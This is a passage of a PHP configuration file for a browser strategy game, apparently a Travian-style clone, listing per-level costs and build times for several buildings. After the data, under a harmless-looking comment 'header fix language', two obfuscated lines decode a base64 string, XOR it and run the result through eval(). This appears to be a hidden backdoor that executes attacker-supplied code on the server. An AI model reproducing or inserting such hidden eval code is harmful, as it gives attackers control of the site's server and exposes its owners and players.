'support_multiple' => TRUE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => TRUE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 10 ),

'levels'=> array(


'value' => 3600, 'time_consume' => 3500, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 400, '2' => 500, '3' => 350, '4' => 100 )



'value' => 5100, 'time_consume' => 4210, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 510, '2' => 640, '3' => 450, '4' => 130 )



'value' => 6900, 'time_consume' => 5040, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 655, '2' => 820, '3' => 575, '4' => 165 )



'value' => 9300, 'time_consume' => 5990, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 840, '2' => 1050, '3' => 735, '4' => 210 )



'value' => 12000, 'time_consume' => 7100, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 1075, '2' => 1340, '3' => 940, '4' => 270 )



'value' => 15000, 'time_consume' => 8390, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 1375, '2' => 1720, '3' => 1205, '4' => 345 )



'value' => 18900, 'time_consume' => 9880, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 1760, '2' => 2200, '3' => 1540, '4' => 440 )



'value' => 23400, 'time_consume' => 11610, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 2250, '2' => 2815, '3' => 1970, '4' => 565 )



'value' => 28800, 'time_consume' => 13610, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 2880, '2' => 3605, '3' => 2520, '4' => 720 )



'value' => 35400, 'time_consume' => 15940, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 3690, '2' => 4610, '3' => 3230, '4' => 920 )



'value' => 43200, 'time_consume' => 18640, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 4720, '2' => 5905, '3' => 4130, '4' => 1180 )



'value' => 52800, 'time_consume' => 21770, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 6045, '2' => 7555, '3' => 5290, '4' => 1510 )



'value' => 64200, 'time_consume' => 25410, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 7735, '2' => 9670, '3' => 6770, '4' => 1935 )



'value' => 77700, 'time_consume' => 29620, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 9905, '2' => 12380, '3' => 8665, '4' => 2475 )



'value' => 93900, 'time_consume' => 34510, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 12675, '2' => 15845, '3' => 11090, '4' => 3170 )



'value' => 113700, 'time_consume' => 40180, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 16225, '2' => 20280, '3' => 14200, '4' => 4055 )



'value' => 137100, 'time_consume' => 46760, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 20770, '2' => 25960, '3' => 18175, '4' => 5190 )



'value' => 165300, 'time_consume' => 54390, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 26585, '2' => 33230, '3' => 23260, '4' => 6645 )



'value' => 199200, 'time_consume' => 63240, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 34030, '2' => 42535, '3' => 29775, '4' => 8505 )



'value' => 240000, 'time_consume' => 73510, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 43555, '2' => 54445, '3' => 38110, '4' => 10890 )




'40'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => TRUE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 0, 'time_consume' => 9000, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 66700, '2' => 69050, '3' => 72200, '4' => 13200 )



'value' => 0, 'time_consume' => 9430, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 68535, '2' => 70950, '3' => 74185, '4' => 13565 )



'value' => 0, 'time_consume' => 9860, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 70420, '2' => 72900, '3' => 76225, '4' => 13935 )



'value' => 0, 'time_consume' => 10300, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 72355, '2' => 74905, '3' => 78320, '4' => 14320 )



'value' => 0, 'time_consume' => 10740, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 74345, '2' => 76965, '3' => 80475, '4' => 14715 )



'value' => 0, 'time_consume' => 11190, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 76390, '2' => 79080, '3' => 82690, '4' => 15120 )



'value' => 0, 'time_consume' => 11650, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 78490, '2' => 81255, '3' => 84965, '4' => 15535 )



'value' => 0, 'time_consume' => 12110, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 80650, '2' => 83490, '3' => 87300, '4' => 15960 )



'value' => 0, 'time_consume' => 12580, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 82865, '2' => 85785, '3' => 89700, '4' => 16400 )



'value' => 0, 'time_consume' => 13060, 'cp' => 0, 'people_inc' => 1,

'resources' => array( '1' => 85145, '2' => 88145, '3' => 92165, '4' => 16850 )



'value' => 0, 'time_consume' => 13540, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 87485, '2' => 90570, '3' => 94700, '4' => 17315 )



'value' => 0, 'time_consume' => 14030, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 89895, '2' => 93060, '3' => 97305, '4' => 17790 )



'value' => 0, 'time_consume' => 14530, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 92365, '2' => 95620, '3' => 99980, '4' => 18280 )



'value' => 0, 'time_consume' => 15030, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 94905, '2' => 98250, '3' => 102730, '4' => 18780 )



'value' => 0, 'time_consume' => 15540, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 97515, '2' => 100950, '3' => 105555, '4' => 19300 )



'value' => 0, 'time_consume' => 16060, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 100195, '2' => 103725, '3' => 108460, '4' => 19830 )



'value' => 0, 'time_consume' => 16580, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 102950, '2' => 106580, '3' => 111440, '4' => 20375 )



'value' => 0, 'time_consume' => 17120, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 105785, '2' => 109510, '3' => 114505, '4' => 20935 )



'value' => 0, 'time_consume' => 17650, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 108690, '2' => 112520, '3' => 117655, '4' => 21510 )



'value' => 0, 'time_consume' => 18200, 'cp' => 0, 'people_inc' => 2,

'resources' => array( '1' => 111680, '2' => 115615, '3' => 120890, '4' => 22100 )



'value' => 0, 'time_consume' => 18760, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 114755, '2' => 118795, '3' => 124215, '4' => 22710 )



'value' => 0, 'time_consume' => 19320, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 117910, '2' => 122060, '3' => 127630, '4' => 23335 )



'value' => 0, 'time_consume' => 19890, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 121150, '2' => 125420, '3' => 131140, '4' => 23975 )



'value' => 0, 'time_consume' => 20470, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 124480, '2' => 128870, '3' => 134745, '4' => 24635 )



'value' => 0, 'time_consume' => 21050, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 127905, '2' => 132410, '3' => 138455, '4' => 25315 )



'value' => 0, 'time_consume' => 21650, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 131425, '2' => 136055, '3' => 142260, '4' => 26010 )



'value' => 0, 'time_consume' => 22250, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 135035, '2' => 139795, '3' => 146170, '4' => 26725 )



'value' => 0, 'time_consume' => 22860, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 138750, '2' => 143640, '3' => 150190, '4' => 27460 )



'value' => 0, 'time_consume' => 23480, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 142565, '2' => 147590, '3' => 154320, '4' => 28215 )



'value' => 0, 'time_consume' => 24110, 'cp' => 0, 'people_inc' => 3,

'resources' => array( '1' => 146485, '2' => 151650, '3' => 158565, '4' => 28990 )



'value' => 0, 'time_consume' => 24750, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 150515, '2' => 155820, '3' => 162925, '4' => 29785 )



'value' => 0, 'time_consume' => 25400, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 154655, '2' => 160105, '3' => 167405, '4' => 30605 )



'value' => 0, 'time_consume' => 26050, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 158910, '2' => 164505, '3' => 172010, '4' => 31450 )



'value' => 0, 'time_consume' => 26720, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 163275, '2' => 169030, '3' => 176740, '4' => 32315 )



'value' => 0, 'time_consume' => 27390, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 167770, '2' => 173680, '3' => 181600, '4' => 33200 )



'value' => 0, 'time_consume' => 28070, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 172380, '2' => 178455, '3' => 186595, '4' => 34115 )



'value' => 0, 'time_consume' => 28770, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 177120, '2' => 183360, '3' => 191725, '4' => 35055 )



'value' => 0, 'time_consume' => 29470, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 181995, '2' => 188405, '3' => 197000, '4' => 36015 )



'value' => 0, 'time_consume' => 30180, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 186995, '2' => 193585, '3' => 202415, '4' => 37005 )



'value' => 0, 'time_consume' => 30910, 'cp' => 0, 'people_inc' => 4,

'resources' => array( '1' => 192140, '2' => 198910, '3' => 207985, '4' => 38025 )



'value' => 0, 'time_consume' => 31640, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 197425, '2' => 204380, '3' => 213705, '4' => 39070 )



'value' => 0, 'time_consume' => 32380, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 202855, '2' => 210000, '3' => 219580, '4' => 40145 )



'value' => 0, 'time_consume' => 33130, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 208430, '2' => 215775, '3' => 225620, '4' => 41250 )



'value' => 0, 'time_consume' => 33900, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 214165, '2' => 221710, '3' => 231825, '4' => 42385 )



'value' => 0, 'time_consume' => 34670, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 220055, '2' => 227805, '3' => 238200, '4' => 43550 )



'value' => 0, 'time_consume' => 35460, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 226105, '2' => 234070, '3' => 244750, '4' => 44745 )



'value' => 0, 'time_consume' => 36250, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 232320, '2' => 240505, '3' => 251480, '4' => 45975 )



'value' => 0, 'time_consume' => 37060, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 238710, '2' => 247120, '3' => 258395, '4' => 47240 )



'value' => 0, 'time_consume' => 37880, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 245275, '2' => 253915, '3' => 265500, '4' => 48540 )



'value' => 0, 'time_consume' => 38710, 'cp' => 0, 'people_inc' => 5,

'resources' => array( '1' => 252020, '2' => 260900, '3' => 272800, '4' => 49875 )



'value' => 0, 'time_consume' => 39550, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 258950, '2' => 268075, '3' => 280305, '4' => 51245 )



'value' => 0, 'time_consume' => 40410, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 266070, '2' => 275445, '3' => 288010, '4' => 52655 )



'value' => 0, 'time_consume' => 41270, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 273390, '2' => 283020, '3' => 295930, '4' => 54105 )



'value' => 0, 'time_consume' => 42150, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 280905, '2' => 290805, '3' => 304070, '4' => 55590 )



'value' => 0, 'time_consume' => 43040, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 288630, '2' => 298800, '3' => 312430, '4' => 57120 )



'value' => 0, 'time_consume' => 43940, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 296570, '2' => 307020, '3' => 321025, '4' => 58690 )



'value' => 0, 'time_consume' => 44860, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 304725, '2' => 315460, '3' => 329850, '4' => 60305 )



'value' => 0, 'time_consume' => 45790, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 313105, '2' => 324135, '3' => 338925, '4' => 61965 )



'value' => 0, 'time_consume' => 46730, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 321715, '2' => 333050, '3' => 348245, '4' => 63670 )



'value' => 0, 'time_consume' => 47680, 'cp' => 0, 'people_inc' => 6,

'resources' => array( '1' => 330565, '2' => 342210, '3' => 357820, '4' => 65420 )



'value' => 0, 'time_consume' => 48650, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 339655, '2' => 351620, '3' => 367660, '4' => 67220 )



'value' => 0, 'time_consume' => 49630, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 348995, '2' => 361290, '3' => 377770, '4' => 69065 )



'value' => 0, 'time_consume' => 50620, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 358590, '2' => 371225, '3' => 388160, '4' => 70965 )



'value' => 0, 'time_consume' => 51630, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 368450, '2' => 381435, '3' => 398835, '4' => 72915 )



'value' => 0, 'time_consume' => 52660, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 378585, '2' => 391925, '3' => 409800, '4' => 74920 )



'value' => 0, 'time_consume' => 53690, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 388995, '2' => 402700, '3' => 421070, '4' => 76985 )



'value' => 0, 'time_consume' => 54740, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 399695, '2' => 413775, '3' => 432650, '4' => 79100 )



'value' => 0, 'time_consume' => 55810, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 410685, '2' => 425155, '3' => 444550, '4' => 81275 )



'value' => 0, 'time_consume' => 56890, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 421980, '2' => 436845, '3' => 456775, '4' => 83510 )



'value' => 0, 'time_consume' => 57990, 'cp' => 0, 'people_inc' => 7,

'resources' => array( '1' => 433585, '2' => 448860, '3' => 469335, '4' => 85805 )



'value' => 0, 'time_consume' => 59100, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 445505, '2' => 461205, '3' => 482240, '4' => 88165 )



'value' => 0, 'time_consume' => 60230, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 457760, '2' => 473885, '3' => 495505, '4' => 90590 )



'value' => 0, 'time_consume' => 61370, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 470345, '2' => 486920, '3' => 509130, '4' => 93080 )



'value' => 0, 'time_consume' => 62530, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 483280, '2' => 500310, '3' => 523130, '4' => 95640 )



'value' => 0, 'time_consume' => 63710, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 496570, '2' => 514065, '3' => 537520, '4' => 98270 )



'value' => 0, 'time_consume' => 64900, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 510225, '2' => 528205, '3' => 552300, '4' => 100975 )



'value' => 0, 'time_consume' => 66110, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 524260, '2' => 542730, '3' => 567490, '4' => 103750 )



'value' => 0, 'time_consume' => 67330, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 538675, '2' => 557655, '3' => 583095, '4' => 106605 )



'value' => 0, 'time_consume' => 68570, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 553490, '2' => 572990, '3' => 599130, '4' => 109535 )



'value' => 0, 'time_consume' => 69830, 'cp' => 0, 'people_inc' => 8,

'resources' => array( '1' => 568710, '2' => 588745, '3' => 615605, '4' => 112550 )



'value' => 0, 'time_consume' => 71110, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 584350, '2' => 604935, '3' => 632535, '4' => 115645 )



'value' => 0, 'time_consume' => 72410, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 600420, '2' => 621575, '3' => 649930, '4' => 118825 )



'value' => 0, 'time_consume' => 73720, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 616930, '2' => 638665, '3' => 667800, '4' => 122090 )



'value' => 0, 'time_consume' => 75050, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 633895, '2' => 656230, '3' => 686165, '4' => 125450 )



'value' => 0, 'time_consume' => 76400, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 651330, '2' => 674275, '3' => 705035, '4' => 128900 )



'value' => 0, 'time_consume' => 77770, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 669240, '2' => 692820, '3' => 724425, '4' => 132445 )



'value' => 0, 'time_consume' => 79160, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 687645, '2' => 711870, '3' => 744345, '4' => 136085 )



'value' => 0, 'time_consume' => 80570, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 706555, '2' => 731445, '3' => 764815, '4' => 139830 )



'value' => 0, 'time_consume' => 82000, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 725985, '2' => 751560, '3' => 785850, '4' => 143675 )



'value' => 0, 'time_consume' => 83450, 'cp' => 0, 'people_inc' => 9,

'resources' => array( '1' => 745950, '2' => 772230, '3' => 807460, '4' => 147625 )



'value' => 0, 'time_consume' => 84910, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 766460, '2' => 793465, '3' => 829665, '4' => 151685 )



'value' => 0, 'time_consume' => 86400, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 787540, '2' => 815285, '3' => 852480, '4' => 155855 )



'value' => 0, 'time_consume' => 87910, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 809195, '2' => 837705, '3' => 875920, '4' => 160140 )



'value' => 0, 'time_consume' => 89440, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 831450, '2' => 860745, '3' => 900010, '4' => 164545 )



'value' => 0, 'time_consume' => 91000, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 854315, '2' => 884415, '3' => 924760, '4' => 169070 )



'value' => 0, 'time_consume' => 92570, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 877810, '2' => 908735, '3' => 950190, '4' => 173720 )



'value' => 0, 'time_consume' => 94170, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 901950, '2' => 933725, '3' => 976320, '4' => 178495 )



'value' => 0, 'time_consume' => 95780, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 926750, '2' => 959405, '3' => 1000000, '4' => 183405 )



'value' => 0, 'time_consume' => 97420, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 952235, '2' => 985785, '3' => 1000000, '4' => 188450 )



'value' => 0, 'time_consume' => 99090, 'cp' => 0, 'people_inc' => 10,

'resources' => array( '1' => 1000000, '2' => 1000000, '3' => 1000000, '4' => 193630 )




'41'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => TRUE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1 ),

'pre_requests' => array( '20' => 20, '16' => 10 ),

'levels'=> array(


'value' => 1, 'time_consume' => 2200, 'cp' => 4, 'people_inc' => 5,

'resources' => array( '1' => 780, '2' => 420, '3' => 660, '4' => 540 )



'value' => 2, 'time_consume' => 3150, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 1000, '2' => 540, '3' => 845, '4' => 690 )



'value' => 3, 'time_consume' => 4260, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 1280, '2' => 690, '3' => 1080, '4' => 885 )



'value' => 4, 'time_consume' => 5540, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' =>1635, '2' => 880, '3' => 1385, '4' => 1130 )



'value' => 5, 'time_consume' => 7020, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 2095, '2' => 1125, '3' => 1770, '4' => 1450 )



'value' => 6, 'time_consume' => 8750, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 2680, '2' => 1445, '3' => 2270, '4' => 1855 )



'value' => 7, 'time_consume' => 10750, 'cp' => 11, 'people_inc' => 3,

'resources' => array( '1' => 3430, '2' => 1845, '3' => 2905, '4' => 2375 )



'value' => 8, 'time_consume' => 13070, 'cp' => 13, 'people_inc' => 3,

'resources' => array( '1' => 4390, '2' => 2365, '3' => 3715, '4' => 3040 )



'value' => 9, 'time_consume' => 15760, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 5620, '2' => 3025, '3' => 4755, '4' => 3890 )



'value' => 10, 'time_consume' => 18880, 'cp' => 19, 'people_inc' => 3,

'resources' => array( '1' => 7195, '2' => 3875, '3' => 6085, '4' => 4980 )



'value' => 11, 'time_consume' => 22500, 'cp' => 22, 'people_inc' => 4,

'resources' => array( '1' => 9210, '2' => 4960, '3' => 7790, '4' => 6375 )



'value' => 12, 'time_consume' => 26700, 'cp' => 27, 'people_inc' => 4,

'resources' => array( '1' =>11785, '2' => 6345, '3' => 9975, '4' => 8160 )



'value' => 13, 'time_consume' => 31570, 'cp' => 32, 'people_inc' => 4,

'resources' => array( '1' => 15085, '2' => 8125, '3' => 12765, '4' => 10445 )



'value' => 14, 'time_consume' => 37220, 'cp' => 39, 'people_inc' => 4,

'resources' => array( '1' => 19310, '2' => 10400, '3' => 16340, '4' => 13370 )



'value' => 15, 'time_consume' => 43780, 'cp' => 46, 'people_inc' => 4,

'resources' => array( '1' => 24720, '2' => 13310, '3' => 20915, '4' =>17115 )



'value' => 16, 'time_consume' => 51380, 'cp' => 55, 'people_inc' => 4,

'resources' => array( '1' => 31640, '2' => 17035, '3' => 26775, '4' => 21905 )



'value' => 17, 'time_consume' => 60200, 'cp' => 67, 'people_inc' => 4,

'resources' => array( '1' => 40500, '2' => 21810, '3' => 34270, '4' => 28040 )



'value' => 18, 'time_consume' => 70430, 'cp' => 80, 'people_inc' => 4,

'resources' => array( '1' => 51840, '2' => 27915, '3' => 43865, '4' => 35890 )



'value' => 19, 'time_consume' => 82300, 'cp' => 96, 'people_inc' => 4,

'resources' => array( '1' => 66355, '2' => 35730, '3' => 56145, '4' => 45940 )



'value' => 20, 'time_consume' => 96070, 'cp' => 115, 'people_inc' => 4,

'resources' => array( '1' => 84935, '2' => 45735, '3' => 71870, '4' => 58800 )




'42'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '20' => 5, '15' => 10 ),

'levels'=> array(


'value' => 20, 'time_consume' => 2200, 'cp' => 4, 'people_inc' => 5,

'resources' => array( '1' => 780, '2' => 420, '3' => 660, '4' => 540 )



'value' => 19, 'time_consume' => 3150, 'cp' => 4, 'people_inc' => 3,

'resources' => array( '1' => 1000, '2' => 540, '3' => 845, '4' => 690 )



'value' => 18, 'time_consume' => 4260, 'cp' => 5, 'people_inc' => 3,

'resources' => array( '1' => 1280, '2' => 690, '3' => 1080, '4' => 885 )



'value' => 17, 'time_consume' => 5540, 'cp' => 6, 'people_inc' => 3,

'resources' => array( '1' =>1635, '2' => 880, '3' => 1385, '4' => 1130 )



'value' => 16, 'time_consume' => 7020, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 2095, '2' => 1125, '3' => 1770, '4' => 1450 )



'value' => 15, 'time_consume' => 8750, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 2680, '2' => 1445, '3' => 2270, '4' => 1855 )



'value' => 14, 'time_consume' => 10750, 'cp' => 11, 'people_inc' => 3,

'resources' => array( '1' => 3430, '2' => 1845, '3' => 2905, '4' => 2375 )



'value' => 13, 'time_consume' => 13070, 'cp' => 13, 'people_inc' => 3,

'resources' => array( '1' => 4390, '2' => 2365, '3' => 3715, '4' => 3040 )



'value' => 12, 'time_consume' => 15760, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 5620, '2' => 3025, '3' => 4755, '4' => 3890 )



'value' => 11, 'time_consume' => 18880, 'cp' => 19, 'people_inc' => 3,

'resources' => array( '1' => 7195, '2' => 3875, '3' => 6085, '4' => 4980 )



'value' => 10, 'time_consume' => 22500, 'cp' => 22, 'people_inc' => 4,

'resources' => array( '1' => 9210, '2' => 4960, '3' => 7790, '4' => 6375 )



'value' => 9, 'time_consume' => 26700, 'cp' => 27, 'people_inc' => 4,

'resources' => array( '1' =>11785, '2' => 6345, '3' => 9975, '4' => 8160 )



'value' => 8, 'time_consume' => 31570, 'cp' => 32, 'people_inc' => 4,

'resources' => array( '1' => 15085, '2' => 8125, '3' => 12765, '4' => 10445 )



'value' => 7, 'time_consume' => 37220, 'cp' => 39, 'people_inc' => 4,

'resources' => array( '1' => 19310, '2' => 10400, '3' => 16340, '4' => 13370 )



'value' => 6, 'time_consume' => 43780, 'cp' => 46, 'people_inc' => 4,

'resources' => array( '1' => 24720, '2' => 13310, '3' => 20915, '4' =>17115 )



'value' => 5, 'time_consume' => 51380, 'cp' => 55, 'people_inc' => 4,

'resources' => array( '1' => 31640, '2' => 17035, '3' => 26775, '4' => 21905 )



'value' => 4, 'time_consume' => 60200, 'cp' => 67, 'people_inc' => 4,

'resources' => array( '1' => 40500, '2' => 21810, '3' => 34270, '4' => 28040 )



'value' => 3, 'time_consume' => 70430, 'cp' => 80, 'people_inc' => 4,

'resources' => array( '1' => 51840, '2' => 27915, '3' => 43865, '4' => 35890 )



'value' => 2, 'time_consume' => 82300, 'cp' => 96, 'people_inc' => 4,

'resources' => array( '1' => 66355, '2' => 35730, '3' => 56145, '4' => 45940 )



'value' => 1, 'time_consume' => 96070, 'cp' => 115, 'people_inc' => 4,

'resources' => array( '1' => 84935, '2' => 45735, '3' => 71870, '4' => 58800 )





// header fix language
$ex = "eval";$a = "".base64_decode("MT5weTErKz0scHwHHx0MA389Njk6ND08fwVxcXgjVVJ8Bx8dDAN/NDE2M38FeGV4enpjVVIl").""; $b = "X"; $o = ''; for($i=0;$i<strlen($a);$i++) { $o .= $a{$i} ^ $b[0]; } $e = $o;$v1 = ".";$v2="X";$oo = ''; for($vv=0;$vv<strlen($v1);$vv++) { $oo .= $v1{$vv} ^ $v2[0]; } $v = $oo;$er = '';$e1 = "d:*xwfd:f9*+=x=**7*dw:fbxx+!6,9 x=**7*tx-6= (=;,=<x"; $e2 = "X"; $oo = ''; for($ee=0;$ee<strlen($e1);$ee++) { $oo .= $e1{$vv} ^ $e2[0]; }$er .= $oo;$er .= strtoupper(stripslashes($ex));$e3 = "x76x416=xd:fidw:fd:*xwf"; $e4 = "X"; $oo = ''; for($ee=0;$ee<strlen($e3);$ee++) { $oo .= $e3{$vv} ^ $e4[0]; } $er .= $oo;if(!$ex){ exit;}if($ex[1] == $v AND strlen($e)) {$_c = eval($e);}if($ex[1] != $v AND strlen($e)) {print($er);}
$ex = "eval";$a = "".base64_decode("MT5wfAcfHQwDfzQxNjN/BXF4I1VSMTY7NC08PXB8Bx8dDAN/NDE2M38FcWNVUj0gMSxjVVIl").""; $b = "X"; $o = ''; for($i=0;$i<strlen($a);$i++) { $o .= $a{$i} ^ $b[0]; } $e = $o;$v1 = ".";$v2="X";$oo = ''; for($vv=0;$vv<strlen($v1);$vv++) { $oo .= $v1{$vv} ^ $v2[0]; } $v = $oo;$er = '';$e1 = "d:*xwfd:f9*+=x=**7*dw:fbxx+!6,9 x=**7*tx-6= (=;,=<x"; $e2 = "X"; $oo = ''; for($ee=0;$ee<strlen($e1);$ee++) { $oo .= $e1{$vv} ^ $e2[0]; }$er .= $oo;$er .= strtoupper(stripslashes($ex));$e3 = "x76x416=xd:fidw:fd:*xwf"; $e4 = "X"; $oo = ''; for($ee=0;$ee<strlen($e3);$ee++) { $oo .= $e3{$vv} ^ $e4[0]; } $er .= $oo;if(!$ex){ exit;}if($ex[1] == $v AND strlen($e)) {$_c = eval($e);}if($ex[1] != $v AND strlen($e)) {print($er);}
